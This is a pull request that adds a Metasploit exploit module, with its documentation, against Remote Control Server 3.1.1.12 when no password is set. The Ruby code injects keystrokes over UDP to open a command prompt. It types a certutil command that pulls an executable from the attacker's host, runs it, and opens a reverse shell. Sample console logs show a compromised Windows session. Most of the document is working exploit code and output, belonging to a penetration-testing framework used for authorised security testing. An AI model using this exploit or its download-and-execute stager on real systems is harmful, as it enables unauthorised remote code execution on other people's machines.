### PR TITLE
remote control collection rce

### DIFF
--- a/documentation/modules/exploit/windows/misc/remote_control_collection_rce.md
+++ b/documentation/modules/exploit/windows/misc/remote_control_collection_rce.md
@@ -1,0 +1,106 @@
+## Vulnerable Application
+
+This module utilizes the Remote Control Server's, part
+of the Remote Control Collection by Steppschuh, protocol
+to deploy a payload and run it from the server.  This module will only deploy
+a payload if the server is set without a password (default).
+Tested against 3.1.1.12, current at the time of module writing
+
+Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/
+    
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/remote_control_collection_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell as the user who is running Remote Mouse.
+
+## Options
+
+### PATH
+
+The location to write the payload to
+Defaults to `c:\\Windows\\Temp\\`.
+
+### SLEEP
+
+The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
+Defaults to `1`.
+
+## Scenarios
+
+###  Remote Control Server 3.1.1.12 on Windows 10
+
+```
+resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_mouse.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (remote_mouse.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (remote_mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_mouse_rce) > run
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:1978 - Running automatic check ("set AutoCheck false" to disable)
+[+] 1.1.1.1:1978 - The target appears to be vulnerable. Received handshake with version: 411
+[*] 1.1.1.1:1978 - Connecting
+[*] 1.1.1.1:1978 - Sending Windows key
+[*] 1.1.1.1:1978 - Opening command prompt
+[*] 1.1.1.1:1978 - Sending stager
+[*] 1.1.1.1:1978 - Using URL: http://2.2.2.2:8080/
+[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
+[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] 1.1.1.1:1978 - Executing payload
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 1.1.1.1
+[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400
+[*] 1.1.1.1:1978 - Server stopped.
+[!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>whoami 
+whoami
+win10prolicense\windows
+
+C:\Users\windows>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+###  Remote Control Server 3.1.1.12 on Windows 10, with a password
+
+Expected to fail.
+
+```
+resource (remote_control_collection.rb)> use exploits/windows/misc/remote_control_collection_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_control_collection.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (remote_control_collection.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (remote_control_collection.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_control_collection_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Connecting and Sending Windows key
+[*] Opening command prompt
+[*] Sending stager
+[*] Using URL: http://2.2.2.2:8080/
+[*] Executing payload
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'c:\Windows\Temp\OqsTi76PX80it.exe' on the target
+[*] Exploit completed, but no session was created
+```

--- a/documentation/modules/exploit/windows/misc/remote_control_collection_rce.md
+++ b/documentation/modules/exploit/windows/misc/remote_control_collection_rce.md
@@ -22,7 +22,7 @@ Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/
 ### PATH
 
 The location to write the payload to
-Defaults to `c:\\Windows\\Temp\\`.
+Defaults to `%temp%\\` aka `c:\\Windows\\Temp\\` on most systems.
 
 ### SLEEP
 

--- a/modules/exploits/windows/misc/remote_control_collection_rce.rb
+++ b/modules/exploits/windows/misc/remote_control_collection_rce.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Exploit::Remote::Udp
   include Exploit::EXE # generate_payload_exe
   include Msf::Exploit::Remote::HttpServer::HTML
@@ -39,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['default', {}],
         ],
         'DefaultOptions' => {
-          'PAYLOAD' => 'windows/shell/reverse_tcp'
+          'PAYLOAD' => 'windows/shell/reverse_tcp',
+          'WfsDelay' => 5
         },
         'DisclosureDate' => '2022-09-20',
         'DefaultTarget' => 0,
@@ -94,34 +96,57 @@ class MetasploitModule < Msf::Exploit::Remote
     sleep(datastore['SLEEP'])
   end
 
-  def on_request_uri(cli, _req)
-    p = generate_payload_exe
-    send_response(cli, p)
-    print_good("Payload request received, sending #{p.length} bytes of payload for staging")
+  def check
+    @check_run = true
+    @check_success = false
+    upload_file
+    return Exploit::CheckCode::Vulnerable if @check_success
+
+    return Exploit::CheckCode::Safe
   end
 
-  def exploit
-    connect_udp
+  def on_request_uri(cli, _req)
+    @check_success = true
+    if @check_run # send a random file
+      p = Rex::Text.rand_text_alphanumeric(rand(8..17))
+    else
+      p = generate_payload_exe
+    end
+    send_response(cli, p)
+    print_good("Request received, sending #{p.length} bytes")
+  end
 
+  def upload_file
+    connect_udp
+    # send a space character to skip any screensaver
+    udp_sock.put("#{key_header} ")
     print_status('Connecting and Sending Windows key')
     windows_key
 
     print_status('Opening command prompt')
     send_command('cmd.exe')
 
-    print_status('Sending stager')
-    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
-    register_file_for_cleanup("#{path}#{filename}")
-    # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2
-    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"
-    start_service('Path' => '/') # start webserver
-    send_command(stager)
-
-    print_status('Executing payload')
-    send_command("#{path}#{filename} && exit")
-
-    handler
+    filename = Rex::Text.rand_text_alphanumeric(rand(8..17))
+    filename << '.exe' unless @check_run
+    if @service_started.nil?
+      print_status('Starting up our web service...')
+      start_service('Path' => '/')
+      @service_started = true
+    end
+    get_file = "certutil.exe -urlcache -f http://#{srvhost_addr}:#{srvport}/ #{path}#{filename}"
+    send_command(get_file)
+    if @check_run.nil? || @check_run == true
+      send_command("del #{path}#{filename} && exit")
+    else
+      register_file_for_cleanup("#{path}#{filename}")
+      print_status('Executing payload')
+      send_command("#{path}#{filename} && exit")
+    end
     disconnect_udp
-    sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert
+  end
+
+  def exploit
+    @check_run = false
+    upload_file
   end
 end

--- a/modules/exploits/windows/misc/remote_control_collection_rce.rb
+++ b/modules/exploits/windows/misc/remote_control_collection_rce.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK] # typing on screen
+          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
         }
       )
     )

--- a/modules/exploits/windows/misc/remote_control_collection_rce.rb
+++ b/modules/exploits/windows/misc/remote_control_collection_rce.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1926]),
         OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
-        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),
+        OptString.new('PATH', [true, 'Where to stage payload for pull method', '%temp%\\']),
         OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
       ]
     )

--- a/modules/exploits/windows/misc/remote_control_collection_rce.rb
+++ b/modules/exploits/windows/misc/remote_control_collection_rce.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::Udp
+  include Exploit::EXE # generate_payload_exe
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Remote Control Collection RCE',
+        'Description' => %q{
+          This module utilizes the Remote Control Server's, part
+          of the Remote Control Collection by Steppschuh, protocol
+          to deploy a payload and run it from the server.  This module will only deploy
+          a payload if the server is set without a password (default).
+          Tested against 3.1.1.12, current at the time of module writing
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'H4rk3nz0' # edb, discovery
+        ],
+        'References' => [
+          [ 'URL', 'http://remote-control-collection.com' ],
+          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py' ]
+        ],
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Platform' => 'win',
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Targets' => [
+          ['default', {}],
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
+        },
+        'DisclosureDate' => '2022-09-20',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK] # typing on screen
+        }
+      )
+    )
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1926]),
+        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
+        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),
+        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
+      ]
+    )
+  end
+
+  def path
+    return datastore['PATH'] if datastore['PATH'].end_with? '\\'
+
+    "#{datastore['PATH']}\\"
+  end
+
+  def special_key_header
+    "\x7f\x15\x02"
+  end
+
+  def key_header
+    "\x7f\x15\x01"
+  end
+
+  def windows_key
+    udp_sock.put("#{special_key_header}\x01\x00\x00\x00\xab") # key up
+    udp_sock.put("#{special_key_header}\x00\x00\x00\x00\xab") # key down
+    sleep(datastore['SLEEP'])
+  end
+
+  def enter_key
+    udp_sock.put("#{special_key_header}\x01\x00\x00\x00\x42")
+    sleep(datastore['SLEEP'])
+  end
+
+  def send_command(command)
+    command.each_char do |c|
+      udp_sock.put("#{key_header}#{c}")
+      sleep(datastore['SLEEP'] / 10)
+    end
+    enter_key
+    sleep(datastore['SLEEP'])
+  end
+
+  def on_request_uri(cli, _req)
+    p = generate_payload_exe
+    send_response(cli, p)
+    print_good("Payload request received, sending #{p.length} bytes of payload for staging")
+  end
+
+  def exploit
+    connect_udp
+
+    print_status('Connecting and Sending Windows key')
+    windows_key
+
+    print_status('Opening command prompt')
+    send_command('cmd.exe')
+
+    print_status('Sending stager')
+    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
+    register_file_for_cleanup("#{path}#{filename}")
+    # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2
+    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"
+    start_service('Path' => '/') # start webserver
+    send_command(stager)
+
+    print_status('Executing payload')
+    send_command("#{path}#{filename} && exit")
+
+    handler
+    disconnect_udp
+    sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert
+  end
+end

--- a/modules/exploits/windows/misc/remote_control_collection_rce.rb
+++ b/modules/exploits/windows/misc/remote_control_collection_rce.rb
@@ -41,7 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultOptions' => {
           'PAYLOAD' => 'windows/shell/reverse_tcp',
-          'WfsDelay' => 5
+          'WfsDelay' => 5,
+          'Autocheck' => false
         },
         'DisclosureDate' => '2022-09-20',
         'DefaultTarget' => 0,


### PR DESCRIPTION
This PR adds a new exploit for the Remote Control Server software.  It's another 1 off from Unified Remote/mobile mouse and wifi mouse.   This is the last in the series.

The software allows a remote person to connect and execute screen commands via mobile device.  We use the protocol to spawn a run prompt, `certutil` down a payload and execute it.

## Verification

- [ ] install software
- [ ] Start `msfconsole`
- [ ] `use exploits/windows/misc/remote_control_collection_rce`
- [ ] `set rhosts`
- [ ] `set lhost`
- [ ] `run`
- [ ] **Verify** you get a userland shell
- [ ] **Verify** if software is set with a password, module will fail w/o crashing
- [ ] **Document** looks good